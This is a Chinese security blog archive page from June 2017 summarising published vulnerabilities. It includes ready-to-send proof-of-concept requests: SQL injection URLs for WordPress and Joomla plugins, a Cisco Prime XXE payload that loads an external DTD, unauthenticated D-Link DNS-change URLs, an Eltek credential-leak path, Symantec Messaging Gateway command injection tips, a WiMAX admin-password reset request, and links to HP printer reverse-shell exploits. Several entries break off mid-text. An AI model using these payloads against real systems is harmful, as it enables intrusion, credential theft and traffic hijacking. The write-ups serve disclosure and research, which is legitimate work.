博文

目前显示的是 六月, 2017的博文

AD

Zeppelin配置不当导致命令执行

介绍Zeppelin:
      “Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的开源框架。Zeppelin提供了数据分析、数据可视化等功能。
Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等。”

漏洞简介:
      Zeppelin默认安装监听0.0.0.0的8080端口,并且允许任何人访问,可能会产生灾难性影响!
       Zeppelin默认启动后,普通用户以 anonymous 身份访问系统Web 控制台,无需身份校验。Zeppelin强大的解释器功能,允许你在 Web 界面执行使用各种编程语言。以下是全量安装Zeppelin所支持的解释器。
spark.SparkInterpreter
spark.PySparkInterpreter
rinterpreter.RRepl
rinterpreter.KnitR
spark.SparkRInterpreter
spark.SparkSqlInterpreter
spark.DepInterpreter
markdown.Markdown
angular.AngularInterpreter
shell.ShellInterpreter
livy.LivySparkInterpreter
livy.LivySparkSQLInterpreter
livy.LivyPySparkInterpreter
livy.LivyPySpark3Interpreter
livy.LivySparkRInterpreter
alluxio.AlluxioInterpreter
file.HDFSFileInterpreter
postgresql.PostgreSqlInterpreter
pig.PigInterpreter
pig.PigQueryInterpreter
flink.FlinkInterpreter
python.PythonInterpreter
python.PythonInterpreterPandasSql
python.P…

Aerohive_HiveOS_LFIandRCE

漏洞说明:
       Aerohive使用的WEB控制台为HiveOS,该WEB的5.1r5到6.1r5直接,存在本地文件包含以及远程命令执行漏洞,攻击者利用这两个漏洞,可以修改登录凭证以及执行任意命令。

POC:
       https://github.com/i1ikey0u/pub1ic_POC/blob/master/AerohiveHiveOS5.1r5to6.1r5rce.py

Telegram4.0.1绕过两步验证重置账号

Telegram4.0.1的密码重置功能存在一个“漏洞”(个人认为在技术上可能并不是一个漏洞),攻击者可以绕过telegram的两步验证,获取到账号所有权。个人认为,如果telegram在其他方面(例如:通讯内容在通信过程中真的在一段时间无法被窃取,本地没有保存敏感信息,或者敏感信息暂时无法明文获取。以及敏感信息只会产生于发送端,递送到目的端)没有问题。那这个漏洞的危害在于“身份仿冒”方面。但看POC视频,研究人员在登录时,时输入了正确的登录密码的。不确定改攻击是否需要正确的密码。所以该漏洞的影响并没有预期那么大。

POC:
      telegram的账号如果开启了两步验证,再登录时会要求进行两步验证。如果攻击者按照如下方式操作,可以绕过两步验证,重置账号:
      1、输入账号(手机号码),输入手机号码收到的验证码。然后进入两步验证界面。
      2、选择“忘记密码”,即忘记了两步验证密码。服务器会将恢复密码发送至当时设置的邮箱内。
      3、在新的界面,选择“邮箱无法接受到验证码”选项,会弹出提示框“如果邮箱无法收到验证码,或者丢失邮箱的访问权,则只能重置账号,或者想办法找到两步验证码”,确认后,进入下一步操作
      4、页码会回到“填写两步验证码”解密,但下面会出现红色选项“重置我的账号”,选择该选项,会弹出警告提示“重置账号是不可逆操作,会删除说有的消息,共享等内容”。确认后,进入账号重置解密,填写姓名,密码等信息,即可。

REF:
       http://securityman.org/telegram-4-0-1-twofactor-authentication-bypass-0day/

CiscoPrimeInfrastructure_XXE_SQLI漏洞一箩筐

漏洞说明:
       CiscoPrimeInfrastructure存在多个漏洞,包含XXE实体注入,SQL注入等。

影响范围:
v1.1~v3.1.6

POC:
       1、XXE(CVE-2017-6662)
        使用一个低权限的用户登录后,选择“设置”-“导出”,选择“PDF”格式后,点击“导出”。勾选“图表/Chart”选项,该选项会使用XML生成SVG格式的图片。
POST /webacs/prime/ui/dashboard/renderer HTTP/1.1
Host: 127.0.0.1
[...]

output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f>
x [
\"http://:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]>%26%65%78%66%69%6c%3b","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData&quo…

WordPress_FormCraftBasic_1.0.5_SQLI

漏洞说明:
       FormCraft是WordPress的一个响应式表单插件。在1.0.5中存在一个POST方式的sql盲注漏洞,位于http://url/wp-content/plugins/formcraft/form.php?id=处。
POC:
       POST website/wp-content/plugins/formcraft/form.php?id= HTTP/1.1
       Host: 127.0.0.1
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 66

EltekSmartPack未授权访问获取用户名凭证

EltekSmartPack存在一个http访问,其存在一个未授权访问漏洞,可以通过该漏洞,获取到几个json回应。该json中会包含设备预置的用户名和md5加密的密码。通过解密后,即可获取到预置的登录凭证。
       POC:
       http://10.211.7.70/RPC/Eltek/cfgUseraccount1.json
       http://10.211.7.70/RPC/Eltek/cfgUseraccount10.json

       ref:https://packetstormsecurity.com/files/143123/Eltek-SmartPack-Backdoor-Account.html

hp_OfficeJet8210_RCE详细解析

探测通过对打印机进行端口探测,发现如下端口: PORT      STATE SERVICE    VERSION 80/tcp    open  http       HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A; 443/tcp   open  ssl/https  HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A; 515/tcp   open  printer 631/tcp   open  ssl/ipp    HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A; 8080/tcp  open  http-proxy HP HTTP Server; HP OfficeJet Pro 8210 - D9L64A; 9100/tcp  open  jetdirect? 其中,80,443,8080 端口为HTTP服务,515端口为LPD服务(用于假脱机打印工作的UNIX后台程序(后台服务)。是一个安装在UNIX打印服务器上的后台程序。它的功能是等待接受客户使用行式打印机远程(LPR)协议传来的打印工作) 631端口为IPP服务(互联网打印协议,用户可以通过互联网进行远程打印及远程管理打印工作。用户可以通过相关界面来控制打印品所使用的纸张种类、分辨率等各种参数。) 在9100端口上,存在一个jetdirect? 的服务,是HP专有的一个协议,该协议支持原始字符打印,也被称为JetDirect, AppSocket ,PDL-datastream。其实该协议并不是一个打印机协议,通过该协议发送的数据,均由打印机设备直接处理,然后将状态、错误信息等直接返回给客户。通过该协议,可以直接获取到执行PJL,PostScript或PCL命令的结果。
例如,通过9100

HP_OfficeJetPro_printer_RCE

漏洞说明:
       HP的OfficeJetPro系列打印机,存在一个远程命令执行漏洞。在未更新的OfficeJet 8210打印机上,向profile.d写入一个脚本,重启设备后,即可获取到一个反弹shell。
       漏洞出在远程重启打印机功能,PJL命令是打印机作业语言模式(PJL)的可用命令。
       攻击者可以利用PJL命令,对启动脚本位置进行写入,然后利用WEB控制台(在 web 界面中使用电源循环功能 (在 "工具" 菜单下))或者SNMP的MIB远程重启打印机,执行写入的恶意命令。
       研究人员 将启动脚本与配置文件的内容写入到profile.d,然后重新启动打印机后,即可通过1270端口访问打印机的Root Shell。



POC:
       请移步github:https://github.com/i1ikey0u/pub1ic_POC/blob/master/hp_OfficeJet8210_rce.py

TIPS:
      CVE-2017-2741

REF:
      https://www.exploit-db.com/exploits/42176/

WordPress_Jobs_1.4_SQL_Injection

WordPress中的job插件,在1.5版本之前,均存在一个sql注入漏洞。

POC:
      http://url/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment

TIPS:
       CVE-2017-9603

Joomla_JoomRecipe_1.0.3_SqlI

joomla中的JoomRecipe插件,在1.0.3版本中存在一个SQL注入漏洞。
       POC:
       http://localhost/[PATH]/all-recipes/category/[SQL]

D-Link多种型号ADSL_DSL设备未授权修改DNS配置

漏洞说明:
       D-Link ADSL DSL的WEB管理应用,存在一个未授权即可修改配置的漏洞。攻击者可以直接利用该漏洞,修改用户的DSL设备DNS,从而进行中间人攻击、钓鱼。

影响范围:
        DSL-2640B SEA_1.01
        DSL-2640B GE_1.07
        DSL-2640U IM_1.00

POC:
       直接请求如下形式的URL即可:
       D-Link ADSL DSL-2640B
       http://url/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1

       DSL-2640B GE_1.07
       http://url/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1

       DSL-2640U IM_1.00
       http://url/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1



SymantecMessagingGateway_RCE

1、本机在127.0.0.1上监听41002端口,Symantec能够通过FTP或者SCP将备份文件存储到远程服务器上。由于这一过程通常耗时较长,因此他们决定通过后台任务方式执行这一过程,同时使用41002端口所对应的服务用来管理这类任务。
2、在前端可以通过下面的连接访问到备份配置页面
https://url/brightmail/admin/backup/backupNow.do
3、Web界面设置的参数最终会被bmagent服务所使用
4、存在如下参数规则:
验证过程使用了如下规则:
remoteBackupAddress不能为空。
remoteBackupAddress必须为可路由的IP地址。
端口(port)不能为空。
端口必须为有效的TCP和UDP端口。
路径(path)不能为空。
5、经过测试,可以通过path参数实现命令注入
6、POC使用流程:
使用有效凭证登陆应用。
转到“/brightmail/admin/backup/backupNow.do”。
选择“Store backup on a remote location”选项。
选择协议类型为SCP。
填入某个有效的SSH服务所对应的IP地址、端口信息。(你可以使用kali系统搭建这个服务)。
启用“Requires authentication”功能。
填入SSH服务所对应的用户名及密码信息。
将攻击载荷放在tmp参数上。不要忘了使用“$()”或者“``”,这样才能执行命令注入攻击。
路径必须是ASCII字符串。载荷中使用空格符(SPACE)会导致某些环节崩溃,你可以使用$IFS来替换空格符,${IFS}是Linux可以用的一个小技巧
7、POC:
POST /brightmail/admin/backup/performBackupNow.do HTTP/1.1
Host: 12.0.0.199:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-La…

WiMAX漏洞一箩筐

安全研究人员在ZyXEL 官网上获取到一个WiMAX 设备固件,分析固件文件系统结构,发现 在/var/www 目录下,是HTML 视图模板文件。随后发现web server的执行路径为:/bin/mini_httpd.elf,然后发现有一个函数通过dlopen()库函数从/lib/web_plugin 目录加载库文件。然后在/lib/web_plugin目录下,研究人员发现了名为libmtk_httpd_plugin.so的动态链接库文件, 在mime_handlers 符号连接处, 有一个用于描述针对不同的MIME 如何处理的结构数组。libmtk_httpd_plugin.so 库中包含了对于http请求的处理函数。
       对于每一个接收到的HTTP请求,web server 都会根据上述提到的MIME结构数组找到匹配项,如果匹配ok,则从这个匹配结果中找到相应的请求处理函数并调用之。
       根据上述提到的MIME结构数组的特征,研究人员找到了mime_handlers 符号列表中的入口项。
        在上图的mime_handlers 符号列表中的入口项的结构中,有一个枚举类型,这个枚举类型标识是否当前用户的请求应该被认证或者不认证(AUTH_REQUIRED/UNAUTHENTICATED),其中很多的URIs是不需要任何认证的,研究人员发现cgi接口:commit2.cgi ,这个URL的处理函数将POST请求的参数和值都存在在内置数据库中(key-value 存储形式,也可能存在NVRAM中)。
       利用方式:通过提交POST请求,参数为ADMIN_PASSWORD=xxxx (xxx为你要修改后的管理员密码)到commit2.cgi,即可修改管理员的密码,从而可以通过web 界面成功登录
OEM后面密码:
可以通过web控制台开启SSH和Telnet 远程登录功能,发现了若干硬编码的类似 Unix形式的密码hash串。
  位于minihttpd.trans中的hash,在minihttpd.trans中,这个脚本会在系统启动的时修改/etc/passwd 和/etc/shadow 两个文件的内容,从而添加后门用户。
后门用户 mfgroot 的密码hash一直没变,都是h$1$.3r0/KnH$eR.mFSJ…

WiMAX_CPE_unauth_change_passwd

受影响设备列表:
GreenPacket OX350 (Version: ?)
GreenPacket OX-350 (Version: ?)
Huawei BM2022 (Version: v2.10.14)
Huawei HES-309M (Version: ?)
Huawei HES-319M (Version: ?)
Huawei HES-319M2W (Version: ?)
Huawei HES-339M (Version: ?)
MADA Soho Wireless Router (Version: v2.10.13)
ZTE OX-330P (Version: ?)
ZyXEL MAX218M (Version: 2.00(UXG.0)D0)
ZyXEL MAX218M1W (Version: 2.00(UXE.3)D0)
ZyXEL MAX218MW (Version: 2.00(UXD.2)D0)
ZyXEL MAX308M (Version: 2.00(UUA.3)D0)
ZyXEL MAX318M (Version: ?)
ZyXEL MAX338M (Version: ?)

使用如下请求,可以将设备的admin用户名重置为"admin"。
POST /commit2.cgi HTTP/1.1
Host: 1.2.3.4
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/